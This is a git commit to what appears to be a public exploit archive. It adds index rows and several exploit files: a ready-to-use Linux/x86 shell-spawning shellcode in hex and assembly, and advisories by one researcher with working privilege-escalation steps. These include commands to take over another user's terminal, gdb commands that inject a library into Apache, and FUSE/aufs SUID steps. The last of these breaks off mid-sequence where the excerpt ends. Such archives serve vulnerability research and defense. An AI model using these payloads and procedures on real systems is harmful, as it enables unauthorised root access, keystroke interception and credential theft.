DB: 2017-03-30

18 new exploits FUSE fusermount Tool - Race Condition Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure Apache 2.2 - Scoreboard Invalid Free On Shutdown Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow FUSE fusermount Tool - Race Condition Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation NTP - Privilege Escalation Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH) Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes) Just Dial Clone Script - 'fid' SQL Injection Just Dial Clone Script - 'fid' Parameter SQL Injection Just Dial Clone Script - 'srch' SQL Injection Just Dial Clone Script - 'srch' Parameter SQL Injection Opensource Classified Ads Script - 'keyword' Parameter SQL Injection EyesOfNetwork (EON) 5.1 - SQL Injection
2017-03-30 05:01:15 +00:00 · 2017-03-30 05:01:15 +00:00 · 8e03027ae5
commit 8e03027ae5
parent 8f7e041fcc
19 changed files with 877 additions and 3 deletions
--- a/files.csv
+++ b/files.csv
@ -4366,6 +4366,7 @@ id,file,description,date,author,platform,type,port
 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 - File Processing Remote Denial of Service",2010-10-19,Sweet,windows,dos,0
 34889,platforms/windows/dos/34889.vcf,"Microsoft Windows Mobile - Overly Long vCard Name Field Denial of Service",2010-10-21,SecurityArchitect.Org,windows,dos,0
 34938,platforms/windows/dos/34938.txt,"TeamSpeak 2.0.32.60 - Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0
+34953,platforms/linux/dos/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,linux,dos,0
 34980,platforms/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0
 35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",linux,dos,0
 35000,platforms/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200
@ -5433,6 +5434,9 @@ id,file,description,date,author,platform,type,port
 41752,platforms/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,hardware,dos,0
 41755,platforms/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,windows,dos,0
 41756,platforms/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos,0
+41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0
+41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0
+41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64  / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8363,7 +8367,6 @@ id,file,description,date,author,platform,type,port
 34822,platforms/windows/local/34822.c,"Microsoft Windows - Local procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,windows,local,0
 34923,platforms/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Privilege Escalation",2014-10-09,"Andy Lutomirski",linux,local,0
 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
-34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition",2010-11-02,halfdog,linux,local,0
 34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",hardware,local,0
 34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
 34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
@ -8897,6 +8900,16 @@ id,file,description,date,author,platform,type,port
 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
 41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0
+41760,platforms/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation",2016-02-22,halfdog,linux,local,0
+41761,platforms/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,linux,local,0
+41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation",2016-11-22,halfdog,linux,local,0
+41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0
+41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0
+41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0
+41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation",2012-10-19,halfdog,linux,local,0
+41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
+41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
+41773,platforms/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15404,6 +15417,7 @@ id,file,description,date,author,platform,type,port
 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
+41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16035,6 +16049,7 @@ id,file,description,date,author,platform,type,port
 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
+41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37018,7 +37033,7 @@ id,file,description,date,author,platform,type,port
 40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
-40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' Parameter SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@ -37069,7 +37084,7 @@ id,file,description,date,author,platform,type,port
 40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
 40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
 40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
-40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
+40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' Parameter SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
 40614,platforms/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
 40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
 40626,platforms/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps,0
@ -37661,3 +37676,5 @@ id,file,description,date,author,platform,type,port
 41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0
 41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0
 41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
+41758,platforms/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' Parameter SQL Injection",2017-03-29,"Ihsan Sencan",php,webapps,0
+41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0
--- a/platforms/lin_x86/shellcode/41757.txt
+++ b/platforms/lin_x86/shellcode/41757.txt
@ -0,0 +1,47 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c) <year> <copyright holders>
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+; 
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+; 
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+;     Name : Linux/x86 - execve(/bin/sh") shellcode (19 bytes)
+;     Author : WangYihang
+;     Email : wangyihanger@gmail.com
+;     Tested on: Linux_x86
+;     Shellcode Length: 19
+;================================================================================
+; Shellcode : 
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+;================================================================================
+; Python : 
+        shellcode = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+;================================================================================
+; Assembly language code : 
+global _start
+        _start:
+                push 0bH
+                pop eax
+                cdq
+                push edx
+                push "//sh"
+                push "/bin"
+                mov ebx, esp
+                int 80H
+;================================================================================
--- a/platforms/linux/local/34953.txt
+++ b/platforms/linux/local/34953.txt
@ -1,4 +1,5 @@
 source: http://www.securityfocus.com/bid/44623/info
+              http://www.halfdog.net/Security/FuseTimerace/

 FUSE fusermount tool is prone to a race-condition vulnerability.

--- a/platforms/linux/dos/41767.txt
+++ b/platforms/linux/dos/41767.txt
@ -0,0 +1,27 @@
+Source: http://www.halfdog.net/Security/2012/LinuxKernelBinfmtScriptStackDataDisclosure/
+
+## Introduction
+
+Problem description: Linux kernel binfmt_script handling in combination with CONFIG_MODULES can lead to disclosure of kernel stack data during execve via copy of data from dangling pointer to stack to growing argv list. Apart from that, the BINPRM_MAX_RECURSION can be exceeded: the maximum of 4 recursions is ignored, instead a maximum of roughly 2^6 recursions is in place.
+
+## Method
+
+Execution of a sequence of crafted scripts causes bprm->interp pointer to be set to data within current stack frame. When frame is left, data at location of dangling pointer can be overwritten before it is added to argv-list in next run and then exported to userspace.
+
+## Results, Discussion
+
+The overwrite is triggered when executables with special names handled by binfmt_script call each other until BINPRM_MAX_RECURSION is reached. During each round, load_script from fs/binfmt_script.c extracts the interpreter name for the next round and stores it within the current stack frame. The pointer to this name is also copied to bprm->interp and used during execution of the next interpreter (also a script) within search_binary_handler function. This is not problematic unless CONFIG_MODULES is also defined. When BINPRM_MAX_RECURSION is reached, load_script returns, thus leaving bprm->interp pointing to a now non-existing stack frame. Due to CONFIG_MODULES and the special interpreter name, search_binary_handler will trigger request for loading of module via request_module and invoke load_script again. The function will then append the data from dangling pointer bprm->interp to exec args, thus disclosing some kernel stack bytes. Output on 64-bit system might contain:
+
+0000170: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
+0000180: 4141 4141 2d35 3600 7878 7800 ffff ffff  AAAA-56.xxx.....
+0000190: ffff ff7f ffff ffff ffff ff7f 809a ac1d  ................
+00001a0: 0078 7878 000d 6669 6c65 2d41 4141 4141  .xxx..file-AAAAA
+00001b0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
+
+Apart from memory disclosure, reaching BINPRM_MAX_RECURSION will not terminate execve call with error, but invocation of load_script is triggered more than the intended maximum of loader invocations, leading to higher CPU consumption from single call to execve.
+
+Impact: Impact is low, since exploitation would need local code execution anyway. Only disclosure of kernel addresses when System.map is not readable seems interesting. The increased CPU load itself could be deemed unproblematic, an attacker in the same position but without this POC would need to fork more processes instead to get same load, which is quite feasable in most situations.
+Affected versions: Not clear right now, bug might have been introduced recently.
+Ubuntu Oneiric i386 kernel (3.0.0-24-generic): Not affected, test script does not cause excessive recursion. Not clear if bug could be triggered using other conditions.
+Ubuntu precise i386 and amd64 kernel (3.2.0-29-generic): Both affected
+Further analysis: It seems, that this scheme with only binfmt_elf and binfmt_script cannot lead to kernel OOPS or problematic stack writes. It could be investigated, if additional modules, e.g. binfmt_misc could open such a hole.
--- a/platforms/linux/dos/41768.txt
+++ b/platforms/linux/dos/41768.txt
@ -0,0 +1,65 @@
+Source: http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/
+
+## Introduction
+
+Apache 2.2 webservers may use a shared memory segment to share child process status information (scoreboard) between the child processes and the parent process running as root. A child running with lower privileges than the parent process might trigger an invalid free in the privileged parent process during parent shutdown by modifying data on the shared memory segment.
+
+## Method
+
+A child process can trigger the bug by changing the value of ap_scoreboard_e sb_type, which resides in the global_score structure on the shared memory segment. The value is usually 2 (SB_SHARED):
+
+typedef struct {
+    int             server_limit;
+    int             thread_limit;
+    ap_scoreboard_e sb_type;
+    ap_generation_t running_generation; /* the generation of children which
+                                         * should still be serving requests.
+                                         */
+    apr_time_t restart_time;
+    int             lb_limit;
+} global_score;
+
+When changing the scoreboard type of a shared memory segment to something else, the root process will try to release the shared memory using free during normal shutdown. Since the memory was allocated using mmap, not malloc, the call to free from ap_cleanup_scoreboard (server/scoreboard.c) triggers abort within libc.
+
+apr_status_t ap_cleanup_scoreboard(void *d)
+{
+    if (ap_scoreboard_image == NULL) {
+        return APR_SUCCESS;
+    }
+    if (ap_scoreboard_image->global->sb_type == SB_SHARED) {
+        ap_cleanup_shared_mem(NULL);
+    }
+    else {
+        free(ap_scoreboard_image->global);
+        free(ap_scoreboard_image);
+        ap_scoreboard_image = NULL;
+    }
+    return APR_SUCCESS;
+}
+
+Abort output is written to apache default error log:
+
+[Fri Dec 30 10:19:57 2011] [notice] caught SIGTERM, shutting down
+*** glibc detected *** /usr/sbin/apache2: free(): invalid pointer: 0xb76f4008 ***
+======= Backtrace: =========
+/lib/i386-linux-gnu/libc.so.6(+0x6ebc2)[0x17ebc2]
+/lib/i386-linux-gnu/libc.so.6(+0x6f862)[0x17f862]
+/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18294d]
+/usr/sbin/apache2(ap_cleanup_scoreboard+0x29)[0xa57519]
+/usr/lib/libapr-1.so.0(+0x19846)[0x545846]
+/usr/lib/libapr-1.so.0(apr_pool_destroy+0x52)[0x5449ec]
+/usr/sbin/apache2(+0x1f063)[0xa52063]
+/usr/sbin/apache2(main+0xeea)[0xa51e3a]
+/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0x129113]
+/usr/sbin/apache2(+0x1ef3d)[0xa51f3d]
+======= Memory map: ========
+00110000-00286000 r-xp 00000000 08:01 132367
+
+To reproduce, attach to a www-data (non-root) child process and increment the value at offset 0x10 in the shared memory segment. The search and replace can also be accomplished by compiling LibScoreboardTest.c (http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/LibScoreboardTest.c) and loading it into a child process using gdb --pid [childpid] and following commands:
+
+set *(int*)($esp+4)="/var/www/libExploit.so"
+set *(int*)($esp+8)=1
+set $eip=*__libc_dlopen_mode
+continue
+
+Without gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.
--- a/platforms/linux/dos/41769.txt
+++ b/platforms/linux/dos/41769.txt
@ -0,0 +1,57 @@
+Source: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/
+
+## Background
+
+The Apache HTTP Server is an open-source HTTP server for modern operating systems including UNIX, Microsoft Windows, Mac OS/X and Netware. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services observing the current HTTP standards. Apache has been the most popular web server on the Internet since April of 1996.
+
+## Problem Description
+
+During routine testing, an integer overflow was found in apache2-mpm-worker 2.2.19 in the function ap_pregsub called from mod-setenvif. The issue affects all versions from 2.0.x to 2.0.64 and 2.2.x to 2.2.21, not depending on the mode of operation (worker, prefork, ..). When a header field is mangled using SetEnvIf, the new environment variable data can be multiples of the size of the submitted header field. When ap_pregsub from server/util.c calculates the buffer size using
+
+        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
+            len += pmatch[no].rm_eo - pmatch[no].rm_so;
+        }
+
+the length value overflows and is used in a subsequent allocation call of buffer too small:
+
+
+    dest = dst = apr_pcalloc(p, len + 1);
+
+The subsequent filling of the buffer with user-supplied data leads to buffer overflow. Even without overflowing, the allocation of significant amounts of server memory for excessivly large environment variables should be considered a problem also.
+
+## Impact
+
+Depending on the input data, exploitation of this issue leads to:
+
+- allocation of large quantities of server memory, killing processes due to out-of-memory conditions or reducing system performance to crawl due to massive swapping.
+- invalid memory access when copying more than 4GB of data into the much smaller buffer. Since the loop copying the data uses only stack and libc-heap, not the apr pool, for source and destination addresses, copy process is linear, starting at low address and pool is separated by unaccessible memory pages for protection on linux. Usually this will only cause termination of the apache process, which is restarted automatically. The impact is increased system load and DOS-condition while under attack.
+- At least with multi-threaded server (worker), arbitrary code execution is proven, on single-threaded varians, the use of crafted stop-sequences might allow code execution even on these systems. On many systems ASLR will reduce the efficiency of the attack, but even with ASLR enabled, the automatic restart of processes allows to probe for all possible mappings of libc. An attacker, that has already access to another account on the machen, might be able to use ApacheNoFollowSymlinkTimerace to learn the memory map of the process, thus having the posibility to reach nearly 100% efficiency.
+
+To trigger this issue, mod_setenvif must be enabled and the attacker has to be able to place a crafted .htaccess file on the server. Since the triggering of the exploit might depend on a magic header field, the malicious .htaccess might be placed as backdoor in web-content .zip files or could be stored dormant on the server until activation by the corresponding magic request.
+
+
+
+
+
+
+Source: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html
+
+## Starting Point
+
+During routine testing, an integer overflow in apache2-mpm-worker 2.2.19 mod-setenvif was found. The crash occured when mangling request headers using a crafted .htaccess-file (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/SingleThread-htaccess). The broken code was ap_pregsub in server/util.c, where the buffer size of a new header field could overflow, the value was then used for memory allocation. When copying data to the buffer an, overwrite of the an apr (apache portable runtime) memory-pool boundaries occured, similar to standard heap buffer overflows.
+
+## Outline of Exploit
+
+The main goals creating the exploit were:
+
+- Exploit has to be triggerable via HTTP GET requests only
+- Exploit data has to be 0-byte free to have valid HTTP-protocol
+- No alternative way of heap-spraying is used, e.g. GET + content-length. All variants I knew of had much too low efficiency
+- Use libc for ROP, although all libc-addresses start with 0-byte, which cannot be sent via HTTP
+- Rely only on libc address guess, but not heap/stack address guess, unless guess could be made nearly 100% reliable
+- Use the already open HTTP-connections and turn them into command connections on the fly
+- Have exploit in less than 256 bytes
+
+Two different exploit layouts were developed. The first one used multiple threads, so that one was overwriting the data of the second thread before hitting the end of the memory area. Precise timing was essential to get shell access.
+
+The second one used a more crafted substitution expression, stopping the copy in a single thread by modifying the regular expression currently processed in the thread. Since there is race condition involved, this exploit was far more reliable than the first one.
--- a/platforms/linux/local/41760.txt
+++ b/platforms/linux/local/41760.txt
@ -0,0 +1,65 @@
+Source: http://www.halfdog.net/Security/2015/PtChownArbitraryPtsAccessViaUserNamespace/
+
+## Introduction
+
+Problem description: With Ubuntu Wily and earlier, /usr/lib/pt_chown was used to change ownership of slave pts devices in /dev/pts to the same uid holding the master file descriptor for the slave. This is done using the pt_chown SUID binary, which invokes the ptsname function on the master-fd, thus again performing a TIOCGPTN ioctl to get the slave pts number. Using the result from the ioctl, the pathname of the slave pts is constructed and chown invoked on it, see login/programs/pt_chown.c:
+  pty = ptsname (PTY_FILENO);
+  if (pty == NULL)
+    ...
+  /* Get the group ID of the special `tty' group.  */
+  p = getgrnam (TTY_GROUP);
+  gid = p ? p->gr_gid : getgid ();
+
+  /* Set the owner to the real user ID, and the group to that special
+     group ID.  */
+  if (chown (pty, getuid (), gid) < 0)
+    return FAIL_EACCES;
+
+  /* Set the permission mode to readable and writable by the owner,
+     and writable by the group.  */
+  if ((st.st_mode & ACCESSPERMS) != (S_IRUSR|S_IWUSR|S_IWGRP)
+      && chmod (pty, S_IRUSR|S_IWUSR|S_IWGRP) < 0)
+    return FAIL_EACCES;
+
+  return 0;
+
+The logic above is severely flawed, when there can be more than one master/slave pair having the same number and thus same name. But this condition can be easily created by creating an user namespace, mounting devpts with the newinstance option, create master and slave pts pairs until the number overlaps with a target pts outside the namespace on the host, where there is interest to gain ownership and then 
+
+## Methods
+
+Exploitation is trivial: At first use any user namespace demo to create the namespace needed, e.g. UserNamespaceExec.c (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c) and work with standard shell commands, e.g. to take over /dev/pts/0:
+
+test# who am I
+test    pts/1        2015-12-27 12:00
+test# ./UserNamespacesExec -- /bin/bash
+Setting uid map in /proc/5783/uid_map
+Setting gid map in /proc/5783/gid_map
+euid: 0, egid: 0
+euid: 0, egid: 0
+root# mkdir mnt
+root# mount -t devpts -o newinstance /dev/pts mnt
+root# cd mnt
+root# chmod 0666 ptmx
+
+Use a second shell to continue:
+
+test# cd /proc/5783/cwd
+test# ls -al
+total 4
+drwxr-xr-x 2 root  root     0 Dec 27 12:48 .
+drwxr-xr-x 7 test users 4096 Dec 27 11:57 ..
+c--------- 1 test users 5, 2 Dec 27 12:48 ptmx
+test# exec 3<>ptmx
+test# ls -al
+total 4
+drwxr-xr-x 2 root  root       0 Dec 27 12:48 .
+drwxr-xr-x 7 test users   4096 Dec 27 11:57 ..
+crw------- 1 test users 136, 0 Dec 27 12:53 0
+crw-rw-rw- 1 test users   5, 2 Dec 27 12:48 ptmx
+test# ls -al /dev/pts/0
+crw--w---- 1 root tty 136, 1 Dec 27  2015 /dev/pts/0
+test# /usr/lib/pt_chown
+test# ls -al /dev/pts/0
+crw--w---- 1 test tty 136, 1 Dec 27 12:50 /dev/pts/0
+
+On systems where the TIOCSTI-ioctl is not prohibited, the tools from TtyPushbackPrivilegeEscalation (http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/) to directly inject code into a shell using the pts device. This is not the case at least on Ubuntu Wily. But as reading and writing to the pts is allowed, the malicious user can not intercept all keystrokes and display faked output from commands never really executed. Thus he could lure the user into a) change his password or attempt to invoke su/sudo or b) simulate a situation, where user's next step is predictable and risky and then stop reading the pts, thus making user to execute a command in completely unexpected way.
--- a/platforms/linux/local/41761.txt
+++ b/platforms/linux/local/41761.txt
@ -0,0 +1,65 @@
+Source: http://www.halfdog.net/Security/2016/AufsPrivilegeEscalationInUserNamespaces/
+
+## Introduction
+
+Problem description: Aufs is a union filesystem to mix content of different underlying filesystems, e.g. read-only medium with r/w RAM-fs. That is also allowed in user namespaces when module was loaded with allow_userns option. Due to different bugs, aufs in a crafted USERNS allows privilege escalation, which is a problem on systems enabling unprivileged USERNS by default, e.g. Ubuntu Wily. All the issues mentioned here were discovered after performing similar analysis on overlayfs, another USERNS enabled union filesystem.
+For a system to be exposed, unprivileged USERNS has to be available and AUFS support enabled for it by loading the aufs module with the appropriate option: modprobe aufs allow_userns.
+
+## AUFS Over Fuse: Loss of Nosuid
+
+Method: Fuse filesystem can be mounted by unprivileged users with the help of the fusermount SUID program. Fuse then can simulate files of any type, mode, UID but they are only visible to the user mounting the filesystem and lose all SUID properties. Those files can be exposed using aufs including the problematic SUID properties. The basic exploitation sequence is:
+Mount fuse filesystem exposing crafted SUID binary
+Create USERNS
+Mount aufs on top of fuse
+Execute the SUID binary via aufs from outside the namespace
+The issue can then be demonstrated using:
+
+SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c)
+FuseMinimal (http://www.halfdog.net/Security/2016/AufsPrivilegeEscalationInUserNamespaces/FuseMinimal.c)
+UserNamespaceExec (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c)
+
+test$ mkdir fuse mnt work
+test$ mv SuidExec RealFile
+test$ ./FuseMinimal fuse
